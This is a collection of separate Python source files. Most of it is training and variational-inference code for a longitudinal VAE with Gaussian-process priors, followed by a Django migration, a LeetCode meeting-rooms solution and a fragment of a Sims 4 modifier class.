:param type_nnet: type of encoder/decoder
:param epochs: numner of epochs
:param dataset: dataset to use in training
:param optimiser: optimiser to be used
:param type_KL: type of KL divergenve computation to use
:param num_samples: number of samples to use
:param latent_dim: number of latent dimensions
:param covar_module0: additive kernel (sum of cross-covariances) without id covariate
:param covar_module1: additive kernel (sum of cross-covariances) with id covariate
:param likelihoods: GPyTorch likelihood model
:param m: variational mean
:param H: variational variance
:param zt_list: list of inducing points
:param P: number of unique instances
:param T: number of longitudinal samples per individual
:param Q: number of covariates
:param weight: value for the weight
:param id_covariate: covariate number of the id
:param loss_function: selected loss function
:param natural_gradient: use of natural gradients
:param natural_gradient_lr: natural gradients learning rate
:param subject_per_batch; number of subjects per batch (vectorisation)
:param memory_dbg: enable debugging
:param eps: jitter
:param results_path: path to results
:param validation_dataset: dataset for vaildation set
:param generation_dataset: dataset to help with sample image generation
:param prediction_dataset; dataset with subjects for prediction
:param gp_mode: GPyTorch gp model
:param csv_file_test_data: path to test data
:param csv_file_test_label: path to test label
:param test_mask_file: path to test mask
:param data_source_path: path to data source
:return trained models and resulting losses
"""
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
N = len(dataset)
assert type_KL == 'GPapprox_closed'
if varying_T:
n_batches = (P + subjects_per_batch - 1)//subjects_per_batch
dataloader = HensmanDataLoader(dataset, batch_sampler=VaryingLengthBatchSampler(VaryingLengthSubjectSampler(dataset, id_covariate), subjects_per_batch), num_workers=4)
else:
batch_size = subjects_per_batch*T
n_batches = (P*T + batch_size - 1)//(batch_size)
dataloader = HensmanDataLoader(dataset, batch_sampler=BatchSampler(SubjectSampler(dataset, P, T), batch_size, drop_last=False), num_workers=4)
net_train_loss_arr = np.empty((0, 1))
recon_loss_arr = np.empty((0, 1))
nll_loss_arr = np.empty((0, 1))
kld_loss_arr = np.empty((0, 1))
penalty_term_arr = np.empty((0, 1))
best_val_pred_mse = np.Inf
best_epoch = 0
for epoch in range(1, epochs + 1):
recon_loss_sum = 0
nll_loss_sum = 0
kld_loss_sum = 0
net_loss_sum = 0
iid_kld_sum = 0
for batch_idx, sample_batched in enumerate(dataloader):
optimiser.zero_grad()
nnet_model.train()
covar_module0.train()
covar_module1.train()
indices = sample_batched['idx']
data = sample_batched['digit'].double().to(device)
train_x = sample_batched['label'].double().to(device)
mask = sample_batched['mask'].double().to(device)
N_batch = data.shape[0]
covariates = torch.cat((train_x[:, :id_covariate], train_x[:, id_covariate+1:]), dim=1)
recon_batch, mu, log_var = nnet_model(data)
[recon_loss, nll] = nnet_model.loss_function(recon_batch, data, mask)
recon_loss = torch.sum(recon_loss)
nll_loss = torch.sum(nll)
PSD_H = H if natural_gradient else torch.matmul(H, H.transpose(-1, -2))
if varying_T:
P_in_current_batch = torch.unique(train_x[:, id_covariate]).shape[0]
kld_loss, grad_m, grad_H = minibatch_KLD_upper_bound_iter(covar_module0, covar_module1, likelihoods, latent_dim, m, PSD_H, train_x, mu, log_var, zt_list, P, P_in_current_batch, N, natural_gradient, id_covariate, eps)
else:
P_in_current_batch = N_batch // T
kld_loss, grad_m, grad_H = minibatch_KLD_upper_bound(covar_module0, covar_module1, likelihoods, latent_dim, m, PSD_H, train_x, mu, log_var, zt_list, P, P_in_current_batch, T, natural_gradient, eps)
recon_loss = recon_loss * P/P_in_current_batch
nll_loss = nll_loss * P/P_in_current_batch
if loss_function == 'nll':
net_loss = nll_loss + kld_loss
elif loss_function == 'mse':
kld_loss = kld_loss / latent_dim
net_loss = recon_loss + weight * kld_loss
net_loss.backward()
optimiser.step()
if natural_gradient:
LH = torch.cholesky(H)
iH = torch.cholesky_solve(torch.eye(H.shape[-1], dtype=torch.double).to(device), LH)
iH_new = iH + natural_gradient_lr*(grad_H + grad_H.transpose(-1,-2))
LiH_new = torch.cholesky(iH_new)
H = torch.cholesky_solve(torch.eye(H.shape[-1], dtype=torch.double).to(device), LiH_new).detach()
m = torch.matmul(H, torch.matmul(iH, m) - natural_gradient_lr*(grad_m - 2*torch.matmul(grad_H, m))).detach()
net_loss_sum += net_loss.item() / n_batches
recon_loss_sum += recon_loss.item() / n_batches
nll_loss_sum += nll_loss.item() / n_batches
kld_loss_sum += kld_loss.item() / n_batches
print('Iter %d/%d - Loss: %.3f - GP loss: %.3f - NLL Loss: %.3f - Recon Loss: %.3f' % (
epoch, epochs, net_loss_sum, kld_loss_sum, nll_loss_sum, recon_loss_sum), flush=True)
penalty_term_arr = np.append(penalty_term_arr, 0.0)
net_train_loss_arr = np.append(net_train_loss_arr, net_loss_sum)
recon_loss_arr = np.append(recon_loss_arr, recon_loss_sum)
nll_loss_arr = np.append(nll_loss_arr, nll_loss_sum)
kld_loss_arr = np.append(kld_loss_arr, kld_loss_sum)
if (not epoch % 25) and epoch != epochs:
with torch.no_grad():
nnet_model.eval()
covar_module0.eval()
covar_module1.eval()
if validation_dataset is not None:
full_mu = torch.zeros(len(dataset), latent_dim, dtype=torch.double).to(device)
prediction_x = torch.zeros(len(dataset), Q, dtype=torch.double).to(device)
for batch_idx, sample_batched in enumerate(dataloader):
label_id = sample_batched['idx']
prediction_x[label_id] = sample_batched['label'].double().to(device)
data = sample_batched['digit'].double().to(device)
covariates = torch.cat((prediction_x[label_id, :id_covariate], prediction_x[label_id, id_covariate+1:]), dim=1)
mu, log_var = nnet_model.encode(data)
full_mu[label_id] = mu
val_pred_mse = validate(nnet_model, type_nnet, validation_dataset, type_KL, num_samples, latent_dim, covar_module0, covar_module1, likelihoods, zt_list, T, weight, full_mu, prediction_x, id_covariate, loss_function, eps=1e-6)
if val_pred_mse < best_val_pred_mse:
best_val_pred_mse = val_pred_mse
best_epoch = epoch
prediction_dataloader = DataLoader(prediction_dataset, batch_sampler=VaryingLengthBatchSampler(
VaryingLengthSubjectSampler(prediction_dataset, id_covariate), subjects_per_batch),
num_workers=4)
full_mu = torch.zeros(len(prediction_dataset), latent_dim, dtype=torch.double).to(device)
prediction_x = torch.zeros(len(prediction_dataset), Q, dtype=torch.double).to(device)
with torch.no_grad():
for batch_idx, sample_batched in enumerate(prediction_dataloader):
label_id = sample_batched['idx']
prediction_x[label_id] = sample_batched['label'].double().to(device)
data = sample_batched['digit'].double().to(device)
covariates = torch.cat(
(prediction_x[label_id, :id_covariate], prediction_x[label_id, id_covariate + 1:]),
dim=1)
mu, log_var = nnet_model.encode(data)
full_mu[label_id] = mu
covar_module0.eval()
covar_module1.eval()
if type_KL == 'GPapprox' or type_KL == 'GPapprox_closed':
MSE_test_GPapprox(csv_file_test_data, csv_file_test_label, test_mask_file,
data_source_path, type_nnet,
nnet_model, covar_module0, covar_module1, likelihoods, results_path,
latent_dim, prediction_x,
full_mu, zt_list, P, T, id_covariate, varying_T,
save_file='result_error_best.csv')
print('Saving better model')
try:
torch.save(nnet_model.state_dict(), os.path.join(results_path, 'nnet_model_best.pth'))
torch.save(gp_model.state_dict(), os.path.join(results_path, 'gp_model_best.pth'))
torch.save(zt_list, os.path.join(results_path, 'zt_list_best.pth'))
torch.save(m, os.path.join(results_path, 'm_best.pth'))
torch.save(H, os.path.join(results_path, 'H_best.pth'))
if results_path and generation_dataset:
prediction_dataloader = DataLoader(prediction_dataset,
batch_sampler=VaryingLengthBatchSampler(
VaryingLengthSubjectSampler(prediction_dataset,
id_covariate),
subjects_per_batch), num_workers=4)
full_mu = torch.zeros(len(prediction_dataset), latent_dim, dtype=torch.double).to(
device)
prediction_x = torch.zeros(len(prediction_dataset), Q, dtype=torch.double).to(device)
for batch_idx, sample_batched in enumerate(prediction_dataloader):
label_id = sample_batched['idx']
prediction_x[label_id] = sample_batched['label'].double().to(device)
data = sample_batched['digit'].double().to(device)
covariates = torch.cat((prediction_x[label_id, :id_covariate],
prediction_x[label_id, id_covariate + 1:]), dim=1)
mu, log_var = nnet_model.encode(data)
full_mu[label_id] = mu
recon_complete_gen(generation_dataset, nnet_model, type_nnet,
results_path, covar_module0,
covar_module1, likelihoods, latent_dim,
'./data', prediction_x, full_mu, epoch,
zt_list, P, T, id_covariate, varying_T)
except e:
print(e)
print('Saving intermediate model failed!')
pass
if torch.cuda.is_available():
torch.cuda.empty_cache()
return penalty_term_arr, net_train_loss_arr, nll_loss_arr, recon_loss_arr, kld_loss_arr, m, H, best_epoch
def minibatch_training(nnet_model, type_nnet, epochs, dataset, optimiser, type_KL, num_samples, latent_dim,
covar_module0, covar_module1, likelihoods, zt_list, P, T, Q, weight, id_covariate,
loss_function, memory_dbg=False, eps=1e-6, results_path=None, validation_dataset=None,
generation_dataset=None, prediction_dataset=None):
"""
Perform training with minibatching (psuedo-minibatching) similar to GPPVAE [Casale el. al, 2018]. See L-VAE supplementary
materials
:param nnet_model: encoder/decoder neural network model
:param type_nnet: type of encoder/decoder
:param epochs: numner of epochs
:param dataset: dataset to use in training
:param optimiser: optimiser to be used
:param type_KL: type of KL divergenve computation to use
:param num_samples: number of samples to use
:param latent_dim: number of latent dimensions
:param covar_module0: additive kernel (sum of cross-covariances) without id covariate
:param covar_module1: additive kernel (sum of cross-covariances) with id covariate
:param likelihoods: GPyTorch likelihood model
:param zt_list: list of inducing points
:param P: number of unique instances
:param T: number of longitudinal samples per individual
:param Q: number of covariates
:param weight: value for the weight
:param id_covariate: covariate number of the id
:param loss_function: selected loss function
:param memory_dbg: enable debugging
:param eps: jitter
:param results_path: path to results
:param validation_dataset: dataset for vaildation set
:param generation_dataset: dataset to help with sample image generation
:param prediction_dataset; dataset with subjects for prediction
:return trained models and resulting losses
"""
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
batch_size = T
assert (type_KL == 'GPapprox_closed' or type_KL == 'GPapprox')
# set up Data Loader for training
dataloader = DataLoader(dataset, batch_size=batch_size, shuffle=False, num_workers=4)
net_train_loss_arr = np.empty((0, 1))
recon_loss_arr = np.empty((0, 1))
nll_loss_arr = np.empty((0, 1))
gp_loss_arr = np.empty((0, 1))
penalty_term_arr = np.empty((0, 1))
for epoch in range(1, epochs + 1):
optimiser.zero_grad()
full_mu = torch.zeros(len(dataset), latent_dim, dtype=torch.double, requires_grad=True).to(device)
full_log_var = torch.zeros(len(dataset), latent_dim, dtype=torch.double, requires_grad=True).to(device)
train_x = torch.zeros(len(dataset), Q, dtype=torch.double, requires_grad=False).to(device)
#Step 1: Encode the sample data to obtain \bar{\mu} and diag(W)
with torch.no_grad():
for batch_idx, sample_batched in enumerate(dataloader):
indices = sample_batched['idx']
data = sample_batched['digit'].double().to(device)
train_x[indices] = sample_batched['label'].double().to(device)
covariates = torch.cat((train_x[indices, :id_covariate], train_x[indices, id_covariate+1:]), dim=1)
mu, log_var = nnet_model.encode(data)
full_mu[indices] = mu
full_log_var[indices] = log_var
mu_grads = torch.zeros(len(dataset), latent_dim, dtype=torch.double, requires_grad=True).to(device)
log_var_grads = torch.zeros(len(dataset), latent_dim, dtype=torch.double, requires_grad=True).to(device)
gp_losses = 0
gp_loss_sum = 0
param_list = []
#Steps 2 & 3: compute d and E, compute gradients of KLD w.r.t S and theta
if type_KL == 'GPapprox':
for sample in range(0, num_samples):
Z = nnet_model.sample_latent(full_mu, full_log_var)
for i in range(0, latent_dim):
Z_dim = Z[:, i]
gp_loss = -elbo(covar_module0[i], covar_module1[i], likelihoods[i], train_x, Z_dim,
zt_list[i].to(device), P, T, eps)
gp_loss_sum = gp_loss.item() + gp_loss_sum
gp_losses = gp_losses + gp_loss
gp_losses = gp_losses / num_samples
gp_loss_sum /= num_samples
elif type_KL == 'GPapprox_closed':
for i in range(0, latent_dim):
mu_sliced = full_mu[:, i]
log_var_sliced = full_log_var[:, i]
gp_loss = deviance_upper_bound(covar_module0[i], covar_module1[i],
likelihoods[i], train_x,
mu_sliced, log_var_sliced,
zt_list[i].to(device), P,
T, eps)
gp_loss_sum = gp_loss.item() + gp_loss_sum
gp_losses = gp_losses + gp_loss
for i in range(0, latent_dim):
param_list += list(covar_module0[i].parameters())
param_list += list(covar_module1[i].parameters())
# param_list.append(zt_list[i])
if loss_function == 'mse':
gp_losses = weight*gp_losses/latent_dim
gp_loss_sum /= latent_dim
mu_grads = torch.autograd.grad(gp_losses, full_mu, retain_graph=True)[0]
log_var_grads = torch.autograd.grad(gp_losses, full_log_var, retain_graph=True)[0]
grads = torch.autograd.grad(gp_losses, param_list)
for ind, p in enumerate(param_list):
p.grad = grads[ind]
recon_loss_sum = 0
nll_loss_sum = 0
#Step 4: compute reconstruction losses w.r.t phi and psi, add dKLD/dphi to the gradients
for batch_idx, sample_batched in enumerate(dataloader):
data = sample_batched['digit'].double().to(device)
mask = sample_batched['mask'].double().to(device)
indices = sample_batched['idx']
label = sample_batched['label'].double().to(device)
covariates = torch.cat((label[:, :id_covariate], label[:, id_covariate+1:]), dim=1)
recon_batch, mu, log_var = nnet_model(data)
[recon_loss, nll] = nnet_model.loss_function(recon_batch, data, mask)
recon_loss = torch.sum(recon_loss)
nll = torch.sum(nll)
mu.backward(mu_grads[indices], retain_graph = True)
log_var.backward(log_var_grads[indices], retain_graph = True)
if loss_function == 'mse':
recon_loss.backward()
elif loss_function == 'nll':
nll.backward()
recon_loss_sum = recon_loss_sum + recon_loss.item()
nll_loss_sum = nll_loss_sum + nll.item()
#Do logging
print('Iter %d/%d - Loss: %.3f - GP loss: %.3f - NLL loss: %.3f - Recon Loss: %.3f' % (
epoch, epochs, recon_loss_sum + weight*gp_loss_sum, gp_loss_sum, nll_loss_sum, recon_loss_sum))
penalty_term_arr = np.append(penalty_term_arr, 0.0)
net_train_loss_arr = np.append(net_train_loss_arr, recon_loss_sum + weight*gp_loss_sum)
nll_loss_arr = np.append(nll_loss_arr, nll_loss_sum)
recon_loss_arr = np.append(recon_loss_arr, recon_loss_sum)
gp_loss_arr = np.append(gp_loss_arr, gp_loss_sum)
#Step 5: apply gradients using an Adam optimiser
optimiser.step()
if (not epoch % 100) and epoch != epochs:
if validation_dataset is not None:
validate(nnet_model, type_nnet, validation_dataset, type_KL, num_samples, latent_dim, covar_module0, covar_module1, likelihoods, zt_list, T, weight, full_mu, train_x, id_covariate, loss_function, eps=1e-6)
if torch.cuda.is_available():
torch.cuda.empty_cache()
if results_path and generation_dataset:
prediction_dataloader = DataLoader(prediction_dataset, batch_size=1000, shuffle=False, num_workers=4)
full_mu = torch.zeros(len(prediction_dataset), latent_dim, dtype=torch.double).to(device)
prediction_x = torch.zeros(len(prediction_dataset), Q, dtype=torch.double).to(device)
with torch.no_grad():
for batch_idx, sample_batched in enumerate(prediction_dataloader):
# no mini-batching. Instead get a batch of dataset size
label_id = sample_batched['idx']
prediction_x[label_id] = sample_batched['label'].double().to(device)
data = sample_batched['digit'].double().to(device)
covariates = torch.cat((prediction_x[label_id, :id_covariate], prediction_x[label_id, id_covariate+1:]), dim=1)
mu, log_var = nnet_model.encode(data)
full_mu[label_id] = mu
recon_complete_gen(generation_dataset, nnet_model, type_nnet,
results_path, covar_module0,
covar_module1, likelihoods, latent_dim,
'./data', prediction_x, full_mu, epoch,
zt_list, P, T, id_covariate)
return penalty_term_arr, net_train_loss_arr, nll_loss_arr, recon_loss_arr, gp_loss_arr
def standard_training(nnet_model, type_nnet, epochs, dataset, optimiser, type_KL, num_samples,
latent_dim, covar_modules, likelihoods, zt_list, id_covariate, P, T, Q, weight, constrain_scales,
loss_function, memory_dbg=False, eps=1e-6, validation_dataset=None, generation_dataset=None, prediction_dataset=None):
"""
Perform training without minibatching.
:param nnet_model: encoder/decoder neural network model
:param type_nnet: type of encoder/decoder
:param epochs: numner of epochs
:param dataset: dataset to use in training
:param optimiser: optimiser to be used
:param type_KL: type of KL divergenve computation to use
:param num_samples: number of samples to use
:param latent_dim: number of latent dimensions
:param covar_modules: additive kernel (sum of cross-covariances)
:param likelihoods: GPyTorch likelihood model
:param zt_list: list of inducing points
:param id_covariate: covariate number of the id
:param P: number of unique instances
:param T: number of longitudinal samples per individual
:param Q: number of covariates
:param weight: value for the weight
:param constrain_scales: boolean to constrain scales to 1
:param loss_function: selected loss function
:param memory_dbg: enable debugging
:param eps: jitter
:param validation_dataset: dataset for vaildation set
:param generation_dataset: dataset to help with sample image generation
:param prediction_dataset; dataset with subjects for prediction
:return trained models and resulting losses
"""
if type_KL == 'closed':
covar_module = covar_modules[0]
elif type_KL == 'GPapprox' or type_KL == 'GPapprox_closed':
covar_module0 = covar_modules[0]
covar_module1 = covar_modules[1]
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# set up Data Loader for training
dataloader = DataLoader(dataset, batch_size=len(dataset), shuffle=False, num_workers=4)
net_train_loss_arr = np.empty((0, 1))
recon_loss_arr = np.empty((0, 1))
nll_loss_arr = np.empty((0, 1))
gp_loss_arr = np.empty((0, 1))
penalty_term_arr = np.empty((0, 1))
for epoch in range(1, epochs + 1):
for batch_idx, sample_batched in enumerate(dataloader):
# no mini-batching. Instead get a batch of dataset size.
optimiser.zero_grad() # clear gradients
label_id = sample_batched['idx']
label = sample_batched['label']
data = sample_batched['digit']
data = data.double().to(device)
mask = sample_batched['mask']
mask = mask.to(device)
train_x = label.double().to(device)
covariates = torch.cat((train_x[:, :id_covariate], train_x[:, id_covariate+1:]), dim=1)
# encode data
recon_batch, mu, log_var = nnet_model(data)
[recon_loss, nll] = nnet_model.loss_function(recon_batch, data, mask)
recon_loss = torch.sum(recon_loss)
nll_loss = torch.sum(nll)
gp_loss_avg = torch.tensor([0.0]).to(device)
net_loss = torch.tensor([0.0]).to(device)
penalty_term = torch.tensor([0.0]).to(device)
for sample_iter in range(0, num_samples):
# Iterate over specified number of samples. Default: num_samples = 1.
Z = nnet_model.sample_latent(mu, log_var)
gp_loss = torch.tensor([0.0]).to(device)
for i in range(0, latent_dim):
Z_dim = Z[:, i].view(-1).type(torch.DoubleTensor).to(device)
if type_KL == 'closed':
# Closed-form KL divergence formula
kld1 = KL_closed(covar_module[i], train_x, likelihoods[i], data, mu[:, i], log_var[:, i])
gp_loss = gp_loss + kld1
elif type_KL == 'conj_gradient':
# GPyTorch default: use modified batch conjugate gradients
# See: https://arxiv.org/abs/1809.11165
gp_models[i].set_train_data(train_x.to(device), Z_dim.to(device))
gp_loss = gp_loss - mlls[i](gp_models[i](train_x.to(device)), Z_dim)
elif type_KL == 'GPapprox':
# Our proposed efficient approximate GP inference scheme
# See: http://arxiv.org/abs/2006.09763
loss = -elbo(covar_module0[i], covar_module1[i], likelihoods[i], train_x, Z_dim,
zt_list[i].to(device), P, T, eps)
gp_loss = gp_loss + loss
elif type_KL == 'GPapprox_closed':
# A variant of our proposed efficient approximate GP inference scheme.
# The key difference with GPapprox is the direct use of the variational mean and variance,
# instead of a sample from Z. We can call this a deviance upper bound.
# See the L-VAE supplement for more details: http://arxiv.org/abs/2006.09763
loss = deviance_upper_bound(covar_module0[i], covar_module1[i], likelihoods[i], train_x,
mu[:, i].view(-1), log_var[:, i].view(-1), zt_list[i].to(device), P,
T, eps)
gp_loss = gp_loss + loss
if type_KL == 'closed' or type_KL == 'GPapprox' or type_KL == 'GPapprox_closed':
if loss_function == 'mse':
gp_loss_avg = gp_loss_avg + (gp_loss / latent_dim)
elif loss_function == 'nll':
gp_loss_avg = gp_loss_avg + gp_loss
elif type_KL == 'conj_gradient':
if loss_function == 'mse':
gp_loss = gp_loss * data.shape[0] / latent_dim
elif loss_function == 'nll':
gp_loss = gp_loss * data.shape[0]
gp_loss_avg = gp_loss_avg + gp_loss
if type_KL == 'closed' or type_KL == 'GPapprox' or type_KL == 'GPapprox_closed':
gp_loss_avg = gp_loss_avg / num_samples
if loss_function == 'mse':
net_loss = recon_loss + weight * gp_loss_avg
elif loss_function == 'nll':
net_loss = nll_loss + gp_loss_avg
elif type_KL == 'conj_gradient':
gp_loss_avg = gp_loss_avg / num_samples
penalty_term = -0.5 * log_var.sum() / latent_dim
if loss_function == 'mse':
net_loss = recon_loss + weight * (gp_loss_avg + penalty_term)
elif loss_function == 'nll':
net_loss = nll_loss + gp_loss_avg + penalty_term
net_loss.backward()
if type_KL == 'closed' or type_KL == 'GPapprox' or type_KL == 'GPapprox_closed':
print('Iter %d/%d - Loss: %.3f - GP loss: %.3f - NLL Loss: %.3f - Recon Loss: %.3f' % (
epoch, epochs, net_loss.item(), gp_loss_avg.item(), nll_loss.item(), recon_loss.item()))
elif type_KL == 'conj_gradient':
print('Iter %d/%d - Loss: %.3f - GP loss: %.3f - Penalty: %.3f - NLL Loss: %.3f - Recon Loss: %.3f' % (
epoch, epochs, net_loss.item(), gp_loss_avg.item(), penalty_term.item(), nll_loss.item(), recon_loss.item()))
penalty_term_arr = np.append(penalty_term_arr, penalty_term.cpu().item())
net_train_loss_arr = np.append(net_train_loss_arr, net_loss.cpu().item())
recon_loss_arr = np.append(recon_loss_arr, recon_loss.cpu().item())
nll_loss_arr = np.append(nll_loss_arr, nll_loss.cpu().item())
gp_loss_arr = np.append(gp_loss_arr, gp_loss_avg.cpu().item())
optimiser.step()
if constrain_scales:
for i in range(0, latent_dim):
likelihoods[i].noise = torch.tensor([1], dtype=torch.float).to(device)
if (not epoch % 100) and epoch != epochs:
if validation_dataset is not None:
standard_validate(nnet_model, type_nnet, validation_dataset, type_KL, num_samples, latent_dim, covar_module0, covar_module1, likelihoods, zt_list, T, weight, mu, train_x, id_covariate, loss_function, eps=1e-6)
if torch.cuda.is_available():
torch.cuda.empty_cache()
return penalty_term_arr, net_train_loss_arr, nll_loss_arr, recon_loss_arr, gp_loss_arr
def variational_inference_optimization(nnet_model, type_nnet, epochs, dataset, prediction_dataset, optimiser,
latent_dim, covar_module0, covar_module1, likelihoods, zt_list, P, T, Q, weight, constrain_scales,
id_covariate, loss_function, memory_dbg=False, eps=1e-6, results_path=None, save_path=None, gp_model_folder=None,
generation_dataset=None):
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# set up Data Loader for training
dataloader = DataLoader(dataset, batch_size=len(dataset), shuffle=False, num_workers=4)
net_train_loss_arr = np.empty((0, 1))
recon_loss_arr = np.empty((0, 1))
nll_loss_arr = np.empty((0, 1))
gp_loss_arr = np.empty((0, 1))
penalty_term_arr = np.empty((0, 1))
for batch_idx, sample_batched in enumerate(dataloader):
label_id = sample_batched['idx']
label = sample_batched['label'].double().to(device)
data = sample_batched['digit'].double().to(device)
mask = sample_batched['mask'].double().to(device)
covariates = torch.cat((label[:, :id_covariate], label[:, id_covariate+1:]), dim=1)
# encode data
mu, log_var = nnet_model.encode(data)
mu = torch.nn.Parameter(mu.clone().detach(), requires_grad=True)
log_var = torch.nn.Parameter(log_var.clone().detach(), requires_grad=True)
try:
mu = torch.load(os.path.join(gp_model_folder, 'mu.pth'), map_location=torch.device(device)).detach().to(device).requires_grad_(True)
log_var = torch.load(os.path.join(gp_model_foder, 'log_var.pth'), map_location=torch.device(device)).detach().to(device).requires_grad_(True)
except:
pass
optimiser.add_param_group({'params': mu})
optimiser.add_param_group({'params': log_var})
for epoch in range(1, epochs + 1):
optimiser.zero_grad()
Z = nnet_model.sample_latent(mu, log_var)
recon_batch = nnet_model.decode(Z)
[recon_loss, nll] = nnet_model.loss_function(recon_batch, data, mask)
recon_loss = torch.sum(recon_loss)
nll_loss = torch.sum(nll)
gp_loss_avg = torch.tensor([0.0]).to(device)
net_loss = torch.tensor([0.0]).to(device)
penalty_term = torch.tensor([0.0]).to(device)
for i in range(0, latent_dim):
loss = deviance_upper_bound(covar_module0[i], covar_module1[i], likelihoods[i], label,
mu[:, i].view(-1), log_var[:, i].view(-1), zt_list[i].to(device), P,
T, eps)
gp_loss_avg = gp_loss_avg + loss / latent_dim
if loss_function == 'mse':
net_loss = recon_loss + weight * gp_loss_avg
elif loss_function == 'nll':
net_loss = nll_loss + gp_loss_avg
net_loss.backward()
print('Iter %d/%d - Loss: %.3f - GP loss: %.3f - NLL Loss: %.3f - Recon Loss: %.3f' % (
epoch, epochs, net_loss.item(), gp_loss_avg.item(), nll_loss.item(), recon_loss.item()),
flush=True)
penalty_term_arr = np.append(penalty_term_arr, penalty_term.cpu().item())
net_train_loss_arr = np.append(net_train_loss_arr, net_loss.cpu().item())
recon_loss_arr = np.append(recon_loss_arr, recon_loss.cpu().item())
nll_loss_arr = np.append(nll_loss_arr, nll_loss.cpu().item())
gp_loss_arr = np.append(gp_loss_arr, gp_loss_avg.cpu().item())
optimiser.step()
if not epoch % 100:
sv_pth = os.path.join(save_path, 'recon_' + str(epoch) + '.pdf')
gen_rotated_mnist_plot(data[1920:2080].cpu().detach(), recon_batch[1920:2080].cpu().detach(), label[1920:2080].cpu().detach(), seq_length=20, num_sets=8, save_file=sv_pth)
torch.save(nnet_model.state_dict(), os.path.join(save_path, 'final-vae_model.pth'))
torch.save(mu, os.path.join(save_path, 'mu.pth'))
torch.save(log_var, os.path.join(save_path, 'log_var.pth'))
for i in range(0, latent_dim):
torch.save(covar_module0[i].state_dict(), os.path.join(save_path, 'cov_module0_' + str(i) + '.pth'))
torch.save(covar_module1[i].state_dict(), os.path.join(save_path, 'cov_module1_' + str(i) + '.pth'))
prediction_dataloader = DataLoader(prediction_dataset, batch_size=len(prediction_dataset), shuffle=False, num_workers=1)
for batch_idx, sample_batched in enumerate(prediction_dataloader):
label_pred = sample_batched['label'].double().to(device)
data_pred = sample_batched['digit'].double().to(device)
mask_pred = sample_batched['mask'].double().to(device)
covariates = torch.cat((label_pred[:, :id_covariate], label_pred[:, id_covariate+1:]), dim=1)
# encode data
mu_pred, log_var_pred = nnet_model.encode(data_pred)
break
try:
mu_pred = torch.load(os.path.join(gp_model_folder, 'mu_pred.pth'), map_location=torch.device(device)).detach().to(device).requires_grad_(True)
log_var_pred = torch.load(os.path.join(gp_model_folder, 'log_var_pred.pth'), map_location=torch.device(device)).detach().to(device).requires_grad_(True)
except:
pass
mu_pred = torch.nn.Parameter(mu_pred.clone().detach(), requires_grad=True)
log_var_pred = torch.nn.Parameter(log_var_pred.clone().detach(), requires_grad=True)
adam_param_list = []
adam_param_list.append({'params': mu_pred})
adam_param_list.append({'params': log_var_pred})
optimiser_pred = torch.optim.Adam(adam_param_list, lr=1e-3)
for epoch in range(1, 1001):
optimiser_pred.zero_grad()
Z = nnet_model.sample_latent(mu_pred, log_var_pred)
recon_batch = nnet_model.decode(Z)
[recon_loss, nll] = nnet_model.loss_function(recon_batch,
data_pred,
mask_pred)
recon_loss = torch.sum(recon_loss)
nll_loss = torch.sum(nll)
gp_loss_avg = torch.tensor([0.0]).to(device)
prediction_mu = torch.cat((mu_pred, mu), dim=0)
prediction_log_var = torch.cat((log_var_pred, log_var), dim=0)
prediction_x = torch.cat((label_pred, label), dim=0)
for i in range(0, latent_dim):
loss = deviance_upper_bound(covar_module0[i], covar_module1[i], likelihoods[i], prediction_x,
prediction_mu[:, i].view(-1), prediction_log_var[:, i].view(-1),
zt_list[i].to(device), P+8, T, eps)
gp_loss_avg = gp_loss_avg + loss / latent_dim
if loss_function == 'mse':
net_loss = recon_loss + weight * gp_loss_avg
elif loss_function == 'nll':
net_loss = nll_loss + gp_loss_avg
net_loss.backward()
print('Iter %d/1000 - Total Loss: %.3f - GP Loss: %.3f - Recon Loss: %.3f' % (
epoch, net_loss.item(), gp_loss_avg.item(), recon_loss.item()),
flush=True)
optimiser_pred.step()
torch.save(mu_pred, os.path.join(save_path, 'mu_pred.pth'))
torch.save(log_var_pred, os.path.join(save_path, 'log_var_pred.pth'))
l = [i*20 + k for i in range(0,8) for k in range(0,5)]
prediction_x = torch.cat((label_pred[l],
label))
prediction_mu = torch.cat((mu_pred[l],
mu))
if generation_dataset:
variational_complete_gen(generation_dataset, nnet_model, type_nnet,
results_path, covar_module0,
covar_module1, likelihoods, latent_dim,
'./data', prediction_x, prediction_mu, 'final',
zt_list, P, T, id_covariate)
exit(0)
| 2.03125
| 2
|
project/program/migrations/0012_auto_20210309_1705.py
|
ElinaSyr/tedxntua2021
| 1
|
12775647
|
<gh_stars>1-10
# Generated by Django 2.2.17 on 2021-03-09 15:05
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('program', '0011_auto_20210309_1703'),
]
operations = [
migrations.RemoveField(
model_name='activity',
name='image_alt',
),
migrations.RemoveField(
model_name='activity',
name='image_alt_height',
),
migrations.RemoveField(
model_name='activity',
name='image_alt_width',
),
migrations.RemoveField(
model_name='presenter',
name='image_alt',
),
migrations.RemoveField(
model_name='presenter',
name='image_alt_height',
),
migrations.RemoveField(
model_name='presenter',
name='image_alt_width',
),
]
| 1.546875
| 2
|
DS-400/Medium/253-Meeting Room II/Sort.py
|
ericchen12377/Leetcode-Algorithm-Python
| 2
|
12775648
|
<filename>DS-400/Medium/253-Meeting Room II/Sort.py
class Solution:
def minMeetingRooms(self, intervals: List[List[int]]) -> int:
rooms = 0
if not intervals:
return 0
endp = 0
starts = sorted([i[0] for i in intervals])
ends = sorted([i[1] for i in intervals])
for i in range(len(starts)):
if starts[i]>=ends[endp]:
endp+=1
else:
rooms+=1
return rooms
| 3.296875
| 3
|
constant/__init__.py
|
Naopil/EldenBot
| 0
|
12775649
|
from .rgapi import *
| 1.132813
| 1
|
S4/S4 Library/simulation/game_effect_modifier/pie_menu_modifier.py
|
NeonOcean/Environment
| 1
|
12775650
|
<gh_stars>1-10
from game_effect_modifier.base_game_effect_modifier import BaseGameEffectModifier
from game_effect_modifier.game_effect_type import GameEffectType
from sims4.localization import TunableLocalizedStringFactory
from sims4.tuning.tunable import OptionalTunable, HasTunableSingletonFactory, AutoFactoryInit, TunableVariant, TunableList
from snippets import TunableAffordanceFilterSnippet, TunableAffordanceListReference
from tag import TunableTags
class AffordanceFilterFactory(HasTunableSingletonFactory, AutoFactoryInit):
FACTORY_TUNABLES = {'affordance_filter': TunableAffordanceFilterSnippet(description='\n Affordances this modifier affects.\n ')}
def __call__(self, affordance):
return self.affordance_filter(affordance)
